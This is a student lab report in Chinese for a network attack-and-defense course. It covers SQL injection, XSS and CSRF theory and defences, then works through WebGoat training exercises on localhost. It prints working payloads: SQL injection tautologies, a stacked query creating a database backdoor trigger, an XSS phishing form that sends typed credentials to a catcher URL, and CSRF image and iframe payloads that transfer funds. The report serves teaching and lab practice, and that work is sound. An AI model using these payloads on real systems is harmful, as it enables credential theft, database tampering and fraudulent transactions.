2018-2019-2 20165333 《网络对抗技术》 Exp 9 Web安全基础

一、基础问题回答

1.SQL注入攻击原理，如何防御？

• 原理：SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。
  sql注入攻击是利用是指利用设计上的漏洞，在目标服务器上运行Sql语句以及进行其他方式的攻击，动态生成Sql语句时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因。如：在用户名、密码登输入框中输入一些',--,#等特殊字符，实现引号闭合、注释部分SQL语句，利用永真式实现登录、显示信息等目的。
• 防御：
  关闭或删除不必要的交互式提交表单页面；
  对漏洞注入点相关代码进行关键字的过滤（如：利用正则表达式），以规范代码安全性；
  不要在服务器端放置备份的文件以免受到感染，或备份的文件含有漏洞，造成切入点；
  将数据库里的内容进行加密处理使其不具有特殊的意义。
  2.XSS攻击的原理，如何防御？
• 原理：XSS:跨站脚本。攻击者利用网站漏洞（通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤），输入可以显示在页面上的、对其他用户造成影响的HTML代码；由于受害者浏览器对目标服务器的信任，当其访问目标服务器上被注入恶意脚本(如：html标签或者javascript代码)的页面后，这段恶意脚本可以顺利执行，实现获取用户cookie并可以利用用户身份进行非法操作的目的。
• 防御：
  用户角度：提高防范意识，不要轻易输入个人信息，如用户名密码；
  网页制作者角度：
  对输入和URL参数进行过滤
  在输出数据之前对潜在的威胁的字符进行编码、转义
  3.CSRF攻击原理，如何防御？
• 原理：
  CSRF ：跨站请求伪造。
  CSRF就是冒名登录。跨站请求伪造的核心本质是窃取用户的Session,或者说Cookie,因为目前主流情况Session都是存在Cookie中.攻击者并不关心被害者具体帐号和密码,因为一旦用户进行了登录,Session就是用户的唯一凭证,只要攻击者能够得到Session,就可以伪装成被害者进入服务器.
  主要是当访问网站A时输入用户名和密码，在通过验证后，网站A产生Cookie信息并返回，此时登录网站A成功，可正常发送请求到网站A。在未退出网站A前，若访问另一个网站B，网站B可返回一些攻击性代码并请求访问网站A；因此在网站B的请求下，向网站A发出请求。但网站A不知道该请求恶意的，因此还是会执行该恶意代码
• 防御：
  验证请求中的Token
  验证 Referer
  添加加随机验证
  设定cookie域

实践过程

（一）Webgoat安装
1.下载webgoat-container-7.0.1-war-exec.jar文件
2、在含有该文件的目录下使用命令java -jar webgoat-container-7.0.1-war-exec.jar运行Webgoat，出现信息: Starting ProtocolHandler ["http-bio-8080"]说明开启成功，实验过程中不能关闭终端
3、在浏览器中输入http://localhost:8080/WebGoat进入WebGoat登录界面
4、使用默认用户名密码guest登录即可

SQL攻击

• 1.Numeric SQL Injection
  右键点击页面，选择inspect Element审查网页元素对源代码进行修改，在选中的城市编号Value值中添加or 1=1:
  

攻击成功，显示所有城市的天气情况:

• 2.Log Spoofing
  利用入回车（0D%）和换行符（%0A），在 username 中填入zch%0d%0aLogin Succeeded for username: admin,攻击成功：
  

• 3.String SQL Injection
  根据题目要求输入：Smith。可以看到查询的相关信息，语句为SELECT * FROM user_data WHERE last_name = 'Smith'

注入永真式'or 1='1攻击成功：

• 4.LAB: SQL Injection
  Stage 1: String SQL Injection：
  输入or 1=1 --进行SQL注入，失败；查看源码发现是对输入长度进行了限制，修改源码再次注入，成功。

• 5.Database Backdoors
  首先验证一下语句，在`user ID输入101; update employee set salary=5000,可以看到更新的数据
  

进行注入101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHEREuserid = NEW.userid创建后门:

XSS攻击

• 1.Phishing with XSS
  在搜索框中直接输入要进行xss的攻击代码。参考编写，添加一个form可以让用户输入用户名和密码，再使这些信息能够发送给网站并显示:

</form>
<script>
    function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    } 
</script>
<form name="phish">
<br>
<br>
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

点击search，出现表单，输入信息,攻击成功:

• 2.Stored XSS Attacks
  创建非法的消息内容，可以导致其他用户访问时载入非预期的页面或内容；命名title，在message里输入一串js代码：<script>alert("boy next door");</script>，点击刚刚创建的帖子，弹出窗口
  

• 3.Reflected XSS Attacks
  输入错误用户信息后，服务器校验输入有误，返回错误页面并将错误内容展示。如果输入一个攻击URL就会返回该信息。输入,提交:
  

CRSF攻击

• 1.Cross Site Request Forgery(CSRF)
  写一个URL放进Message框，使其他用户不可见，设置成一个隐藏图片，用户一旦点击就会触发一个CSRF事件;在Message里输入<img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" />;点击该消息，页面就会下载这个消息并显示，就会执行转走用户的存款。
  

• 2.CSRF Prompt By-Pass
  message框中输入：

<iframe src="attack?Screen=[scr]menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>

查看消息，看到转账消息: